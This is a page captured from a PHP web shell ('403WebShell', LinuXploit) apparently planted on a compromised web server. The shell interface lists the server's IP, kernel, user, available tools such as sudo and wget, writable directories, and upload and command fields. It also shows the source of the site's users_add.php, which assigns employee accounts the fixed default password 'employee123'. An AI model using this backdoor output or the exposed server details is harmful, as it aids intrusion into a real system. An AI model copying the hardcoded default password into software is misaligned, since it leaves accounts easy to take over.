Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/vhost/itms.arukustech.com/public/api/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhost/itms.arukustech.com/public/api/users_add.php
<?php
require_once __DIR__ . '/../../app/db.php';
require_once __DIR__ . '/../../app/helpers/auth.php';

auth();

// Only admin/superadmin can add users
if (!in_array($_SESSION['role'], ['admin', 'superadmin'])) {
    header("Location: /users.php?error=denied");
    exit;
}

$pdo = db();

// Validate required fields
$name  = trim($_POST['name']);
$role  = trim($_POST['role']);
$email = trim($_POST['email']);
$empid = trim($_POST['employee_id']);
$mobile = trim($_POST['mobile']);
$dept   = trim($_POST['department']);
$status = isset($_POST['status']) ? 1 : 0;
$password = trim($_POST['password']);

if ($name === "") {
    header("Location: /users_add.php?error=Name is required");
    exit;
}

// Password only needed for login users
if ($role !== "employee") {
    if ($password === "") {
        header("Location: /users_add.php?error=Password is required for login users");
        exit;
    }
    $hashed = password_hash($password, PASSWORD_BCRYPT);
} else {
    // Dummy password because DB requires NOT NULL
    $hashed = password_hash("employee123", PASSWORD_BCRYPT);
}

// Unique email check
if ($email !== "") {
    $check = $pdo->prepare("SELECT id FROM users WHERE email=?");
    $check->execute([$email]);

    if ($check->fetch()) {
        header("Location: /users_add.php?error=Email already exists");
        exit;
    }
}

$stmt = $pdo->prepare("
    INSERT INTO users (employee_id, name, email, mobile, department, role, password, status)
    VALUES (?, ?, ?, ?, ?, ?, ?, ?)
");

$stmt->execute([
    $empid,
    $name,
    $email,
    $mobile,
    $dept,
    $role,
    $hashed,
    $status
]);

header("Location: /users.php?added=1");
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit